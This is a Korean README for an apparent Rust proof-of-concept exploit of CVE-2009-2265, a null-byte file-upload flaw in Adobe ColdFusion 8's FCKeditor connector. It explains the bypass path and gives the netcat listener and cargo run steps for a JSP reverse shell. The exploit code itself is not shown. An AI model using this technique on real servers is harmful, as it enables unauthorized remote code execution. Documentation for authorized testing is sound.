
A Rust 구현으로 작성된 CVE-2009-2265 익스플로잇 POC로, Adobe ColdFusion 8을 대상으로 합니다.
CVE-2009-2265 익스플로잇에 대한 POC의 Rust 구현, Adobe ColdFusion 8을 대상으로 합니다.
이 취약점은 인증되지 않은 공격자가 Adobe ColdFusion 8을 실행하는 서버의 웹 접근 가능 디렉터리에 임의의 파일을 업로드하여 원격 코드 실행(RCE)을 유발할 수 있게 합니다.
upload.cfm 커넥터CurrentFolder이 취약점은 /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm에 위치한 FCKeditor 구성 요소의 파일 업로드 기능에 존재합니다. CurrentFolder HTTP GET 파라미터가 적절히 검증되지 않아 널 바이트(%00) 주입 공격이 가능합니다.
CurrentFolder 파라미터를 /<filename>.jsp%00으로 설정한 요청을 구성함으로써 공격자는 서버 측 확장자 검사를 우회할 수 있습니다. 기본 시스템(종종 Java)은 널 바이트를 문자열의 끝으로 해석하여 파일 이름을 <filename>.jsp로 처리합니다. 이를 통해 공격자는 악성 JSP 파일을 업로드할 수 있습니다. 서버는 이 파일을 공개적으로 접근 가능한 디렉터리(/userfiles/file/)에 저장하며, 해당 URL에 접근하기만 하면 실행됩니다.
이 POC는 JSP 리버스 셸 페이로드를 생성하고, 널 바이트 취약점을 이용하여 업로드한 후, 이를 트리거하여 대상 시스템에서 셸을 획득하는 과정을 자동화합니다.
익스플로잇을 컴파일하고 실행하려면 다음 단계를 따르세요.
익스플로잇을 실행하기 전에 로컬 머신에서 들어오는 리버스 셸을 수신할 리스너를 시작하세요.
nc -lnvp <attacker-port>
컴파일된 바이너리를 실행하여 리버스 셸용 로컬 호스트/포트와 원격 대상의 호스트/포트를 제공하세요.
cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>
스크립트가 페이로드를 트리거한 후 Netcat 리스너에서 연결을 수신해야 합니다.
이 도구는 교육 및 승인된 침투 테스트 목적으로만 사용됩니다. 책임감 있게 사용하고 자신이 소유했거나 명시적 권한이 있는 시스템에서만 사용하세요.